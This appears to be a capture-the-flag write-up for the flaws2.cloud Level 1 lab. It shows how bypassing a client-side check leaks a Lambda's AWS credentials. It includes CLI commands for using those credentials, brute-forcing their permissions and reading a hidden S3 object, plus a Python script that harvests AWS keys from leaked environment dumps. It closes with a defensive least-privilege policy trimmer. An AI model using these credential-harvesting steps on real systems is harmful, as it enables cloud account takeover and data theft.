flaws2.cloud (Level 1)
b) This is a client-side check only, so we can bypass it by editing the HTML in the browser's developer tools: remove the form's "onsubmit" handler so the JavaScript that validates the code never runs. Alternatively, submit a valid (all-digit) code, intercept the request in Burp Suite, and change the code value before forwarding it to the server.
c) With the check bypassed, submitting a code that contains non-digit characters makes the backend throw an error. The error response includes debugging output that dumps the function's environment variables, and among them are the credentials of the Lambda's IAM role (AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY and AWS_SESSION_TOKEN).
d) Configuring the leaked credentials in the AWS CLI under a profile named test. These are temporary credentials, so the session token has to be set as well (aws configure only prompts for the key ID and secret; use aws configure set aws_session_token ... --profile test or edit ~/.aws/credentials by hand). Then confirm they work:
aws sts get-caller-identity --profile test
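The following is an added example (not part of the original write-up) that automates steps c) and d): it scans a leaked environment dump for the three Lambda credential variables, tells temporary (ASIA) keys apart from long-lived (AKIA) ones so you know a session token is required, and renders the ~/.aws/credentials stanza for the test profile. The sample error body and the credential values are constructed for the example and are not the real challenge response or working keys.

```python
import json
import re

# Constructed sample of an error body that dumps environment variables.
# This is NOT the real challenge response; the values follow AWS's
# documented "EXAMPLE" credential format and are not working keys.
SAMPLE_ERROR_BODY = json.dumps({
    "message": "Internal server error",
    "environment": {
        "AWS_REGION": "us-east-1",
        "AWS_LAMBDA_FUNCTION_NAME": "level1",
        "AWS_ACCESS_KEY_ID": "ASIAIOSFODNN7EXAMPLE",
        "AWS_SECRET_ACCESS_KEY": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
        "AWS_SESSION_TOKEN": "FwoGZXIvYXdzEBAaDEXAMPLESESSIONTOKEN+/=",
    },
})

CRED_VARS = ("AWS_ACCESS_KEY_ID", "AWS_SECRET_ACCESS_KEY", "AWS_SESSION_TOKEN")

# Matches NAME=value, NAME: value and "NAME": "value", so the same scan works on
# a JSON error body, a Python repr of os.environ, or a plain `env` dump.
_CRED_RE = re.compile(
    r'(AWS_ACCESS_KEY_ID|AWS_SECRET_ACCESS_KEY|AWS_SESSION_TOKEN)'
    r'["\']?\s*[:=]\s*["\']?([A-Za-z0-9+/=]+)'
)


def extract_aws_credentials(body: str) -> dict:
    """Pull the Lambda credential variables out of a leaked dump (empty dict if none)."""
    found = {name: value for name, value in _CRED_RE.findall(body)}
    return {name: found[name] for name in CRED_VARS if name in found}


def credential_kind(access_key_id: str) -> str:
    """Key-ID prefix tells you what you have: ASIA = temporary STS credentials
    (only valid together with a session token), AKIA = long-lived IAM user key."""
    if access_key_id.startswith("ASIA"):
        return "temporary"
    if access_key_id.startswith("AKIA"):
        return "long-lived"
    return "unknown"


def credentials_profile(creds: dict, profile: str = "test") -> str:
    """Render an ~/.aws/credentials stanza, including the session token when present."""
    lines = [
        f"[{profile}]",
        f"aws_access_key_id = {creds['AWS_ACCESS_KEY_ID']}",
        f"aws_secret_access_key = {creds['AWS_SECRET_ACCESS_KEY']}",
    ]
    if creds.get("AWS_SESSION_TOKEN"):
        lines.append(f"aws_session_token = {creds['AWS_SESSION_TOKEN']}")
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    creds = extract_aws_credentials(SAMPLE_ERROR_BODY)
    kind = credential_kind(creds["AWS_ACCESS_KEY_ID"])
    if kind == "temporary" and "AWS_SESSION_TOKEN" not in creds:
        raise SystemExit("ASIA key without a session token: the dump is incomplete")
    print(f"# {kind} credentials; append to ~/.aws/credentials, then run:")
    print("# aws sts get-caller-identity --profile test")
    print(credentials_profile(creds))
```

Paste the printed stanza into ~/.aws/credentials (or feed the three values to aws configure set) and the get-caller-identity call above should return the Lambda role's assumed-role ARN.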
e) Enumerating the permissions of these credentials by brute force with bf-aws-permissions.sh:
./bf-aws-permissions.sh -p test -r us-east-1
We tried every API call it reported as allowed but found nothing interesting that way.
f) Wappalyzer shows that level1.flaws2.cloud is served from an S3 bucket (static website hosting, with the bucket named after the hostname). With the Lambda role's credentials we can list the bucket and fetch the hidden page:
aws --profile test s3 ls level1.flaws2.cloud
aws --profile test s3 cp s3://level1.flaws2.cloud/secret-ppxVFdwV4DDtZm8vbQRvhxL8mE6wxNco.html /tmp/html
Lesson learned (Source - challenge 2)
Whereas EC2 instances obtain the credentials for their IAM roles from the metadata service at 169.254.169.254 (as you learned in flaws.cloud Level 5), AWS Lambda obtains those credentials from environmental variables. Often developers will dump environmental variables when error conditions occur in order to help them debug problems. This is dangerous as sensitive information can sometimes be found in environmental variables.
Another problem is the IAM role had privileges to list the contents of a bucket that wasn’t needed for its operation. The best practice is to follow a Least Privilege strategy by giving services only the minimal privileges in their IAM policies that they need to accomplish their purpose. AWS CloudTrail logs can help identify past usage (leveraged by Duo Security’s CloudTracker) or AWS Access Advisor (leveraged by Netflix’s RepoKid).
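As an added illustration of the least-privilege point above (this is example code, not part of the challenge or of CloudTracker/RepoKid), the snippet below does in miniature what those tools do: compare the actions a role's policy grants against the actions it was actually observed using, flag the unused grants, and emit a trimmed policy. The "before" policy, the observed-usage set and the account ID 123456789012 are constructed for the example; the real Level 1 role policy is not reproduced here.

```python
import copy
from fnmatch import fnmatch

ACCOUNT = "123456789012"  # placeholder account ID for the sample ARNs

# Constructed "before" policy: the Lambda's role can also list and read the
# bucket, which the function's code never needs.
OVERLY_BROAD_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow",
         "Action": ["logs:CreateLogGroup", "logs:CreateLogStream", "logs:PutLogEvents"],
         "Resource": f"arn:aws:logs:us-east-1:{ACCOUNT}:*"},
        {"Effect": "Allow",
         "Action": ["s3:ListBucket", "s3:GetObject"],
         "Resource": ["arn:aws:s3:::level1.flaws2.cloud",
                      "arn:aws:s3:::level1.flaws2.cloud/*"]},
    ],
}

# Constructed "after" policy: only what a Lambda needs to write its own logs.
LEAST_PRIVILEGE_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow",
         "Action": ["logs:CreateLogGroup", "logs:CreateLogStream", "logs:PutLogEvents"],
         "Resource": f"arn:aws:logs:us-east-1:{ACCOUNT}:*"},
    ],
}

# Constructed observed usage: the calls CloudTrail (or Access Advisor) would
# show this role making over a review window. The function only writes logs.
OBSERVED_ACTIONS = {"logs:CreateLogGroup", "logs:CreateLogStream", "logs:PutLogEvents"}


def _as_list(value):
    """IAM allows a string or a list for Action/Resource; normalise to a list."""
    return value if isinstance(value, list) else [value]


def allowed_actions(policy: dict) -> set:
    """Every action pattern granted by an Allow statement (Deny statements are ignored)."""
    actions = set()
    for stmt in policy["Statement"]:
        if stmt.get("Effect") == "Allow":
            actions.update(_as_list(stmt.get("Action", [])))
    return actions


def unused_actions(policy: dict, observed: set) -> set:
    """Granted patterns that no observed call matches; fnmatch handles s3:* style wildcards."""
    return {pattern for pattern in allowed_actions(policy)
            if not any(fnmatch(used, pattern) for used in observed)}


def wildcard_actions(policy: dict) -> set:
    """Wildcard grants are worth flagging even when something matched them."""
    return {pattern for pattern in allowed_actions(policy) if "*" in pattern}


def trim_policy(policy: dict, observed: set) -> dict:
    """Copy of the policy with unused actions removed and emptied statements dropped."""
    unused = unused_actions(policy, observed)
    trimmed = copy.deepcopy(policy)
    kept = []
    for stmt in trimmed["Statement"]:
        if stmt.get("Effect") != "Allow":
            kept.append(stmt)
            continue
        actions = [a for a in _as_list(stmt.get("Action", [])) if a not in unused]
        if actions:
            stmt["Action"] = actions
            kept.append(stmt)
    trimmed["Statement"] = kept
    return trimmed


if __name__ == "__main__":
    print("unused grants:", sorted(unused_actions(OVERLY_BROAD_POLICY, OBSERVED_ACTIONS)))
    print("wildcards:", sorted(wildcard_actions(OVERLY_BROAD_POLICY)))
    print("trimmed statements:", trim_policy(OVERLY_BROAD_POLICY, OBSERVED_ACTIONS)["Statement"])
```

Run against the constructed inputs, the unused set is the two S3 actions and the trimmed policy grants exactly what the least-privilege version does. In a real review the observed set would come from CloudTrail events for the role over a long enough window to cover rarely exercised code paths, and wildcard grants should be replaced by explicit actions before, not after, trimming.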
Thanks for reading!! Please give your feedback.